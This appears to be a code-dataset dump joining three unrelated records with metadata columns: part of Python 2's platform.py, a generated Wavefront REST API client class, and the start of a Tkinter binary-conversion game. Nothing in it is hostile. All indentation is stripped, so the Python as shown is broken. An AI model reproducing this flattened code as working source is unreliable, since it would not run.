elif system in ('win32','win16'):
# In case one of the other tricks
system = 'Windows'
return system,release,version
### Various internal helpers
def _platform(*args):
""" Helper to format the platform string in a filename
compatible format e.g. "system-version-machine".
"""
# Format the platform string
platform = string.join(
map(string.strip,
filter(len, args)),
'-')
# Cleanup some possible filename obstacles...
replace = string.replace
platform = replace(platform,' ','_')
platform = replace(platform,'/','-')
platform = replace(platform,'\\','-')
platform = replace(platform,':','-')
platform = replace(platform,';','-')
platform = replace(platform,'"','-')
platform = replace(platform,'(','-')
platform = replace(platform,')','-')
# No need to report 'unknown' information...
platform = replace(platform,'unknown','')
# Fold '--'s and remove trailing '-'
while 1:
cleaned = replace(platform,'--','-')
if cleaned == platform:
break
platform = cleaned
while platform[-1] == '-':
platform = platform[:-1]
return platform
def _node(default=''):
""" Helper to determine the node name of this machine.
"""
try:
import socket
except ImportError:
# No sockets...
return default
try:
return socket.gethostname()
except socket.error:
# Still not working...
return default
# os.path.abspath is new in Python 1.5.2:
if not hasattr(os.path,'abspath'):
def _abspath(path,
isabs=os.path.isabs,join=os.path.join,getcwd=os.getcwd,
normpath=os.path.normpath):
if not isabs(path):
path = join(getcwd(), path)
return normpath(path)
else:
_abspath = os.path.abspath
def _follow_symlinks(filepath):
""" In case filepath is a symlink, follow it until a
real file is reached.
"""
filepath = _abspath(filepath)
while os.path.islink(filepath):
filepath = os.path.normpath(
os.path.join(os.path.dirname(filepath),os.readlink(filepath)))
return filepath
def _syscmd_uname(option,default=''):
""" Interface to the system's uname command.
"""
if sys.platform in ('dos','win32','win16','os2'):
# XXX Others too ?
return default
try:
f = os.popen('uname %s 2> %s' % (option, DEV_NULL))
except (AttributeError,os.error):
return default
output = string.strip(f.read())
rc = f.close()
if not output or rc:
return default
else:
return output
def _syscmd_file(target,default=''):
""" Interface to the system's file command.
The function uses the -b option of the file command to have it
ommit the filename in its output and if possible the -L option
to have the command follow symlinks. It returns default in
case the command should fail.
"""
# We do the import here to avoid a bootstrap issue.
# See c73b90b6dadd changeset.
#
# [..]
# ranlib libpython2.7.a
# gcc -o python \
# Modules/python.o \
# libpython2.7.a -lsocket -lnsl -ldl -lm
# Traceback (most recent call last):
# File "./setup.py", line 8, in <module>
# from platform import machine as platform_machine
# File "[..]/build/Lib/platform.py", line 116, in <module>
# import sys,string,os,re,subprocess
# File "[..]/build/Lib/subprocess.py", line 429, in <module>
# import select
# ImportError: No module named select
import subprocess
if sys.platform in ('dos','win32','win16','os2'):
# XXX Others too ?
return default
target = _follow_symlinks(target)
try:
proc = subprocess.Popen(['file', target],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
except (AttributeError,os.error):
return default
output = proc.communicate()[0]
rc = proc.wait()
if not output or rc:
return default
else:
return output
### Information about the used architecture
# Default values for architecture; non-empty strings override the
# defaults given as parameters
_default_architecture = {
'win32': ('','WindowsPE'),
'win16': ('','Windows'),
'dos': ('','MSDOS'),
}
_architecture_split = re.compile(r'[\s,]').split
def architecture(executable=sys.executable,bits='',linkage=''):
""" Queries the given executable (defaults to the Python interpreter
binary) for various architecture information.
Returns a tuple (bits,linkage) which contains information about
the bit architecture and the linkage format used for the
executable. Both values are returned as strings.
Values that cannot be determined are returned as given by the
parameter presets. If bits is given as '', the sizeof(pointer)
(or sizeof(long) on Python version < 1.5.2) is used as
indicator for the supported pointer size.
The function relies on the system's "file" command to do the
actual work. This is available on most if not all Unix
platforms. On some non-Unix platforms where the "file" command
does not exist and the executable is set to the Python interpreter
binary defaults from _default_architecture are used.
"""
# Use the sizeof(pointer) as default number of bits if nothing
# else is given as default.
if not bits:
import struct
try:
size = struct.calcsize('P')
except struct.error:
# Older installations can only query longs
size = struct.calcsize('l')
bits = str(size*8) + 'bit'
# Get data from the 'file' system command
if executable:
output = _syscmd_file(executable, '')
else:
output = ''
if not output and \
executable == sys.executable:
# "file" command did not return anything; we'll try to provide
# some sensible defaults then...
if sys.platform in _default_architecture:
b, l = _default_architecture[sys.platform]
if b:
bits = b
if l:
linkage = l
return bits, linkage
# Split the output into a list of strings omitting the filename
fileout = _architecture_split(output)[1:]
if 'executable' not in fileout:
# Format not supported
return bits,linkage
# Bits
if '32-bit' in fileout:
bits = '32bit'
elif 'N32' in fileout:
# On Irix only
bits = 'n32bit'
elif '64-bit' in fileout:
bits = '64bit'
# Linkage
if 'ELF' in fileout:
linkage = 'ELF'
elif 'PE' in fileout:
# E.g. Windows uses this format
if 'Windows' in fileout:
linkage = 'WindowsPE'
else:
linkage = 'PE'
elif 'COFF' in fileout:
linkage = 'COFF'
elif 'MS-DOS' in fileout:
linkage = 'MSDOS'
else:
# XXX the A.OUT format also falls under this class...
pass
return bits,linkage
### Portable uname() interface
_uname_cache = None
def uname():
""" Fairly portable uname interface. Returns a tuple
of strings (system,node,release,version,machine,processor)
identifying the underlying platform.
Note that unlike the os.uname function this also returns
possible processor information as an additional tuple entry.
Entries which cannot be determined are set to ''.
"""
global _uname_cache
no_os_uname = 0
if _uname_cache is not None:
return _uname_cache
processor = ''
# Get some infos from the builtin os.uname API...
try:
system,node,release,version,machine = os.uname()
except AttributeError:
no_os_uname = 1
if no_os_uname or not filter(None, (system, node, release, version, machine)):
# Hmm, no there is either no uname or uname has returned
#'unknowns'... we'll have to poke around the system then.
if no_os_uname:
system = sys.platform
release = ''
version = ''
node = _node()
machine = ''
use_syscmd_ver = 1
# Try win32_ver() on win32 platforms
if system == 'win32':
release,version,csd,ptype = win32_ver()
if release and version:
use_syscmd_ver = 0
# Try to use the PROCESSOR_* environment variables
# available on Win XP and later; see
# http://support.microsoft.com/kb/888731 and
# http://www.geocities.com/rick_lively/MANUALS/ENV/MSWIN/PROCESSI.HTM
if not machine:
# WOW64 processes mask the native architecture
if "PROCESSOR_ARCHITEW6432" in os.environ:
machine = os.environ.get("PROCESSOR_ARCHITEW6432", '')
else:
machine = os.environ.get('PROCESSOR_ARCHITECTURE', '')
if not processor:
processor = os.environ.get('PROCESSOR_IDENTIFIER', machine)
# Try the 'ver' system command available on some
# platforms
if use_syscmd_ver:
system,release,version = _syscmd_ver(system)
# Normalize system to what win32_ver() normally returns
# (_syscmd_ver() tends to return the vendor name as well)
if system == 'Microsoft Windows':
system = 'Windows'
elif system == 'Microsoft' and release == 'Windows':
# Under Windows Vista and Windows Server 2008,
# Microsoft changed the output of the ver command. The
# release is no longer printed. This causes the
# system and release to be misidentified.
system = 'Windows'
if '6.0' == version[:3]:
release = 'Vista'
else:
release = ''
# In case we still don't know anything useful, we'll try to
# help ourselves
if system in ('win32','win16'):
if not version:
if system == 'win32':
version = '32bit'
else:
version = '16bit'
system = 'Windows'
elif system[:4] == 'java':
release,vendor,vminfo,osinfo = java_ver()
system = 'Java'
version = string.join(vminfo,', ')
if not version:
version = vendor
# System specific extensions
if system == 'OpenVMS':
# OpenVMS seems to have release and version mixed up
if not release or release == '0':
release = version
version = ''
# Get processor information
try:
import vms_lib
except ImportError:
pass
else:
csid, cpu_number = vms_lib.getsyi('SYI$_CPU',0)
if (cpu_number >= 128):
processor = 'Alpha'
else:
processor = 'VAX'
if not processor:
# Get processor information from the uname system command
processor = _syscmd_uname('-p','')
#If any unknowns still exist, replace them with ''s, which are more portable
if system == 'unknown':
system = ''
if node == 'unknown':
node = ''
if release == 'unknown':
release = ''
if version == 'unknown':
version = ''
if machine == 'unknown':
machine = ''
if processor == 'unknown':
processor = ''
# normalize name
if system == 'Microsoft' and release == 'Windows':
system = 'Windows'
release = 'Vista'
_uname_cache = system,node,release,version,machine,processor
return _uname_cache
### Direct interfaces to some of the uname() return values
def system():
""" Returns the system/OS name, e.g. 'Linux', 'Windows' or 'Java'.
An empty string is returned if the value cannot be determined.
"""
return uname()[0]
def node():
""" Returns the computer's network name (which may not be fully
qualified)
An empty string is returned if the value cannot be determined.
"""
return uname()[1]
def release():
""" Returns the system's release, e.g. '2.2.0' or 'NT'
An empty string is returned if the value cannot be determined.
"""
return uname()[2]
def version():
""" Returns the system's release version, e.g. '#3 on degas'
An empty string is returned if the value cannot be determined.
"""
return uname()[3]
def machine():
""" Returns the machine type, e.g. 'i386'
An empty string is returned if the value cannot be determined.
"""
return uname()[4]
def processor():
""" Returns the (true) processor name, e.g. 'amdk6'
An empty string is returned if the value cannot be
determined. Note that many platforms do not provide this
information or simply return the same value as for machine(),
e.g. NetBSD does this.
"""
return uname()[5]
### Various APIs for extracting information from sys.version
_sys_version_parser = re.compile(
r'([\w.+]+)\s*' # "version<space>"
r'\(#?([^,]+)' # "(#buildno"
r'(?:,\s*([\w ]*)' # ", builddate"
r'(?:,\s*([\w :]*))?)?\)\s*' # ", buildtime)<space>"
r'\[([^\]]+)\]?') # "[compiler]"
_ironpython_sys_version_parser = re.compile(
r'IronPython\s*'
'([\d\.]+)'
'(?: \(([\d\.]+)\))?'
' on (.NET [\d\.]+)')
# IronPython covering 2.6 and 2.7
_ironpython26_sys_version_parser = re.compile(
r'([\d.]+)\s*'
'\(IronPython\s*'
'[\d.]+\s*'
'\(([\d.]+)\) on ([\w.]+ [\d.]+(?: \(\d+-bit\))?)\)'
)
_pypy_sys_version_parser = re.compile(
r'([\w.+]+)\s*'
'\(#?([^,]+),\s*([\w ]+),\s*([\w :]+)\)\s*'
'\[PyPy [^\]]+\]?')
_sys_version_cache = {}
def _sys_version(sys_version=None):
""" Returns a parsed version of Python's sys.version as tuple
(name, version, branch, revision, buildno, builddate, compiler)
referring to the Python implementation name, version, branch,
revision, build number, build date/time as string and the compiler
identification string.
Note that unlike the Python sys.version, the returned value
for the Python version will always include the patchlevel (it
defaults to '.0').
The function returns empty strings for tuple entries that
cannot be determined.
sys_version may be given to parse an alternative version
string, e.g. if the version was read from a different Python
interpreter.
"""
# Get the Python version
if sys_version is None:
sys_version = sys.version
# Try the cache first
result = _sys_version_cache.get(sys_version, None)
if result is not None:
return result
# Parse it
if 'IronPython' in sys_version:
# IronPython
name = 'IronPython'
if sys_version.startswith('IronPython'):
match = _ironpython_sys_version_parser.match(sys_version)
else:
match = _ironpython26_sys_version_parser.match(sys_version)
if match is None:
raise ValueError(
'failed to parse IronPython sys.version: %s' %
repr(sys_version))
version, alt_version, compiler = match.groups()
buildno = ''
builddate = ''
elif sys.platform.startswith('java'):
# Jython
name = 'Jython'
match = _sys_version_parser.match(sys_version)
if match is None:
raise ValueError(
'failed to parse Jython sys.version: %s' %
repr(sys_version))
version, buildno, builddate, buildtime, _ = match.groups()
if builddate is None:
builddate = ''
compiler = sys.platform
elif "PyPy" in sys_version:
# PyPy
name = "PyPy"
match = _pypy_sys_version_parser.match(sys_version)
if match is None:
raise ValueError("failed to parse PyPy sys.version: %s" %
repr(sys_version))
version, buildno, builddate, buildtime = match.groups()
compiler = ""
else:
# CPython
match = _sys_version_parser.match(sys_version)
if match is None:
raise ValueError(
'failed to parse CPython sys.version: %s' %
repr(sys_version))
version, buildno, builddate, buildtime, compiler = \
match.groups()
name = 'CPython'
if builddate is None:
builddate = ''
elif buildtime:
builddate = builddate + ' ' + buildtime
if hasattr(sys, 'subversion'):
# sys.subversion was added in Python 2.5
_, branch, revision = sys.subversion
else:
branch = ''
revision = ''
# Add the patchlevel version if missing
l = string.split(version, '.')
if len(l) == 2:
l.append('0')
version = string.join(l, '.')
# Build and cache the result
result = (name, version, branch, revision, buildno, builddate, compiler)
_sys_version_cache[sys_version] = result
return result
def python_implementation():
""" Returns a string identifying the Python implementation.
Currently, the following implementations are identified:
'CPython' (C implementation of Python),
'IronPython' (.NET implementation of Python),
'Jython' (Java implementation of Python),
'PyPy' (Python implementation of Python).
"""
return _sys_version()[0]
def python_version():
""" Returns the Python version as string 'major.minor.patchlevel'
Note that unlike the Python sys.version, the returned value
will always include the patchlevel (it defaults to 0).
"""
return _sys_version()[1]
def python_version_tuple():
""" Returns the Python version as tuple (major, minor, patchlevel)
of strings.
Note that unlike the Python sys.version, the returned value
will always include the patchlevel (it defaults to 0).
"""
return tuple(string.split(_sys_version()[1], '.'))
def python_branch():
""" Returns a string identifying the Python implementation
branch.
For CPython this is the Subversion branch from which the
Python binary was built.
If not available, an empty string is returned.
"""
return _sys_version()[2]
def python_revision():
""" Returns a string identifying the Python implementation
revision.
For CPython this is the Subversion revision from which the
Python binary was built.
If not available, an empty string is returned.
"""
return _sys_version()[3]
def python_build():
""" Returns a tuple (buildno, builddate) stating the Python
build number and date as strings.
"""
return _sys_version()[4:6]
def python_compiler():
""" Returns a string identifying the compiler used for compiling
Python.
"""
return _sys_version()[6]
### The Opus Magnum of platform strings :-)
_platform_cache = {}
def platform(aliased=0, terse=0):
""" Returns a single string identifying the underlying platform
with as much useful information as possible (but no more :).
The output is intended to be human readable rather than
machine parseable. It may look different on different
platforms and this is intended.
If "aliased" is true, the function will use aliases for
various platforms that report system names which differ from
their common names, e.g. SunOS will be reported as
Solaris. The system_alias() function is used to implement
this.
Setting terse to true causes the function to return only the
absolute minimum information needed to identify the platform.
"""
result = _platform_cache.get((aliased, terse), None)
if result is not None:
return result
# Get uname information and then apply platform specific cosmetics
# to it...
system,node,release,version,machine,processor = uname()
if machine == processor:
processor = ''
if aliased:
system,release,version = system_alias(system,release,version)
if system == 'Windows':
# MS platforms
rel,vers,csd,ptype = win32_ver(version)
if terse:
platform = _platform(system,release)
else:
platform = _platform(system,release,version,csd)
elif system in ('Linux',):
# Linux based systems
distname,distversion,distid = dist('')
if distname and not terse:
platform = _platform(system,release,machine,processor,
'with',
distname,distversion,distid)
else:
# If the distribution name is unknown check for libc vs. glibc
libcname,libcversion = libc_ver(sys.executable)
platform = _platform(system,release,machine,processor,
'with',
libcname+libcversion)
elif system == 'Java':
# Java platforms
r,v,vminfo,(os_name,os_version,os_arch) = java_ver()
if terse or not os_name:
platform = _platform(system,release,version)
else:
platform = _platform(system,release,version,
'on',
os_name,os_version,os_arch)
elif system == 'MacOS':
# MacOS platforms
if terse:
platform = _platform(system,release)
else:
platform = _platform(system,release,machine)
else:
# Generic handler
if terse:
platform = _platform(system,release)
else:
bits,linkage = architecture(sys.executable)
platform = _platform(system,release,machine,processor,bits,linkage)
_platform_cache[(aliased, terse)] = platform
return platform
### Command line interface
if __name__ == '__main__':
# Default is to print the aliased verbose platform string
terse = ('terse' in sys.argv or '--terse' in sys.argv)
aliased = (not 'nonaliased' in sys.argv and not '--nonaliased' in sys.argv)
print platform(aliased,terse)
sys.exit(0)
|
mit
| -3,123,977,640,802,781,000
| 30.921459
| 82
| 0.56988
| false
| 4.079859
| false
| false
| false
|
wavefrontHQ/python-client
|
wavefront_api_client/api/monitored_service_api.py
|
1
|
22234
|
# coding: utf-8
"""
Wavefront REST API
<p>The Wavefront REST API enables you to interact with Wavefront servers using standard REST API tools. You can use the REST API to automate commonly executed operations such as automatically tagging sources.</p><p>When you make REST API calls outside the Wavefront REST API documentation you must add the header \"Authorization: Bearer <<API-TOKEN>>\" to your HTTP requests.</p> # noqa: E501
OpenAPI spec version: v2
Contact: chitimba@wavefront.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from wavefront_api_client.api_client import ApiClient
class MonitoredServiceApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def batch_update(self, **kwargs): # noqa: E501
"""Update multiple applications and services in a batch. Batch size is limited to 100. # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.batch_update(async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[MonitoredServiceDTO] body: Example Body: <pre>[{ \"application\": \"beachshirts\", \"service\": \"shopping\", \"satisfiedLatencyMillis\": \"100000\", \"customDashboardLink\": \"shopping-dashboard\", \"hidden\": \"false\" },{ \"application\": \"beachshirts\", \"service\": \"delivery\", \"satisfiedLatencyMillis\": \"100\", \"customDashboardLink\": \"shopping-dashboard\", \"hidden\": \"false\" }]</pre>
:return: ResponseContainer
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.batch_update_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.batch_update_with_http_info(**kwargs) # noqa: E501
return data
def batch_update_with_http_info(self, **kwargs): # noqa: E501
"""Update multiple applications and services in a batch. Batch size is limited to 100. # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.batch_update_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[MonitoredServiceDTO] body: Example Body: <pre>[{ \"application\": \"beachshirts\", \"service\": \"shopping\", \"satisfiedLatencyMillis\": \"100000\", \"customDashboardLink\": \"shopping-dashboard\", \"hidden\": \"false\" },{ \"application\": \"beachshirts\", \"service\": \"delivery\", \"satisfiedLatencyMillis\": \"100\", \"customDashboardLink\": \"shopping-dashboard\", \"hidden\": \"false\" }]</pre>
:return: ResponseContainer
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method batch_update" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/monitoredservice/services', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainer', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_services(self, **kwargs): # noqa: E501
"""Get all monitored services # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_services(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset:
:param int limit:
:return: ResponseContainerPagedMonitoredServiceDTO
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_all_services_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_all_services_with_http_info(**kwargs) # noqa: E501
return data
def get_all_services_with_http_info(self, **kwargs): # noqa: E501
"""Get all monitored services # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_services_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset:
:param int limit:
:return: ResponseContainerPagedMonitoredServiceDTO
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['offset', 'limit'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_services" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/monitoredservice', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerPagedMonitoredServiceDTO', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_service(self, application, service, **kwargs): # noqa: E501
"""Get a specific application # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_service(application, service, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str application: (required)
:param str service: (required)
:return: ResponseContainerMonitoredServiceDTO
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_service_with_http_info(application, service, **kwargs) # noqa: E501
else:
(data) = self.get_service_with_http_info(application, service, **kwargs) # noqa: E501
return data
def get_service_with_http_info(self, application, service, **kwargs): # noqa: E501
"""Get a specific application # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_service_with_http_info(application, service, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str application: (required)
:param str service: (required)
:return: ResponseContainerMonitoredServiceDTO
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['application', 'service'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_service" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'application' is set
if ('application' not in params or
params['application'] is None):
raise ValueError("Missing the required parameter `application` when calling `get_service`") # noqa: E501
# verify the required parameter 'service' is set
if ('service' not in params or
params['service'] is None):
raise ValueError("Missing the required parameter `service` when calling `get_service`") # noqa: E501
collection_formats = {}
path_params = {}
if 'application' in params:
path_params['application'] = params['application'] # noqa: E501
if 'service' in params:
path_params['service'] = params['service'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/monitoredservice/{application}/{service}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerMonitoredServiceDTO', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_services_of_application(self, application, **kwargs): # noqa: E501
"""Get a specific application # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_services_of_application(application, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str application: (required)
:param int offset:
:param int limit:
:return: ResponseContainerPagedMonitoredServiceDTO
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_services_of_application_with_http_info(application, **kwargs) # noqa: E501
else:
(data) = self.get_services_of_application_with_http_info(application, **kwargs) # noqa: E501
return data
def get_services_of_application_with_http_info(self, application, **kwargs): # noqa: E501
"""Get a specific application # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_services_of_application_with_http_info(application, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str application: (required)
:param int offset:
:param int limit:
:return: ResponseContainerPagedMonitoredServiceDTO
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['application', 'offset', 'limit'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_services_of_application" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'application' is set
if ('application' not in params or
params['application'] is None):
raise ValueError("Missing the required parameter `application` when calling `get_services_of_application`") # noqa: E501
collection_formats = {}
path_params = {}
if 'application' in params:
path_params['application'] = params['application'] # noqa: E501
query_params = []
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/monitoredservice/{application}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerPagedMonitoredServiceDTO', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_service(self, application, service, **kwargs): # noqa: E501
"""Update a specific service # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_service(application, service, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str application: (required)
:param str service: (required)
:param MonitoredServiceDTO body: Example Body: <pre>{ \"application\": \"beachshirts\", \"service\": \"shopping\", \"satisfiedLatencyMillis\": \"100000\", \"customDashboardLink\": \"shopping-dashboard\", \"hidden\": \"false\" }</pre>
:return: ResponseContainerMonitoredServiceDTO
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_service_with_http_info(application, service, **kwargs) # noqa: E501
else:
(data) = self.update_service_with_http_info(application, service, **kwargs) # noqa: E501
return data
def update_service_with_http_info(self, application, service, **kwargs): # noqa: E501
"""Update a specific service # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_service_with_http_info(application, service, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str application: (required)
:param str service: (required)
:param MonitoredServiceDTO body: Example Body: <pre>{ \"application\": \"beachshirts\", \"service\": \"shopping\", \"satisfiedLatencyMillis\": \"100000\", \"customDashboardLink\": \"shopping-dashboard\", \"hidden\": \"false\" }</pre>
:return: ResponseContainerMonitoredServiceDTO
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['application', 'service', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_service" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'application' is set
if ('application' not in params or
params['application'] is None):
raise ValueError("Missing the required parameter `application` when calling `update_service`") # noqa: E501
# verify the required parameter 'service' is set
if ('service' not in params or
params['service'] is None):
raise ValueError("Missing the required parameter `service` when calling `update_service`") # noqa: E501
collection_formats = {}
path_params = {}
if 'application' in params:
path_params['application'] = params['application'] # noqa: E501
if 'service' in params:
path_params['service'] = params['service'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/monitoredservice/{application}/{service}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerMonitoredServiceDTO', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
|
apache-2.0
| 2,556,072,987,155,370,000
| 40.097967
| 443
| 0.588153
| false
| 4.24556
| false
| false
| false
|
RichieStacker/bingame
|
bingame_forms.py
|
1
|
9548
|
# Number-to-binary game
# Copyright (C) 2013 Jonathan Humphreys
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import random, Tkinter
from bingame_maths import get_remainder, half_number
from bingame_grading import grade
# Class to store data relevant to this form.
# error_count will need to be accessible from outside this form, though.
class GameMain():
def __init__(self, forms, apps):
self.forms = forms # Need to carry the whole dictionary across every damn class.
self.apps = apps
self.parent = self.forms["root"] # root is the parent of all widgets created in this class.
self.number = random.randint(1, 2048) # Randomly generated, between 1 and 2048. The player must gradually find the binary value of this number.
self.progress = self.number # The current number that must be divided by 2 to continue. Initially the same as "number".
self.answer = 0 # The player's answer.
self.remainder = 0 # The remainder from their answer. Can only ever be 1 or 0.
self.answer_chain = [] # Stores each answer and its remainder and is recited with each step.
self.error_count = 0 # Counts the number of errors a player makes in the process of a conversion.
self.init_ui()
# Configures the window to the appropriate paramaters.
def init_ui(self):
